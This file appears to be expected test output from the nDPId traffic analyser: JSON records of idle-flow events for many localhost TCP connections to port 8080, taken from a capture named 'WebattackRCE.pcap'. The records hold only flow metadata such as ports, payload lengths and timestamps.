+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7560000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 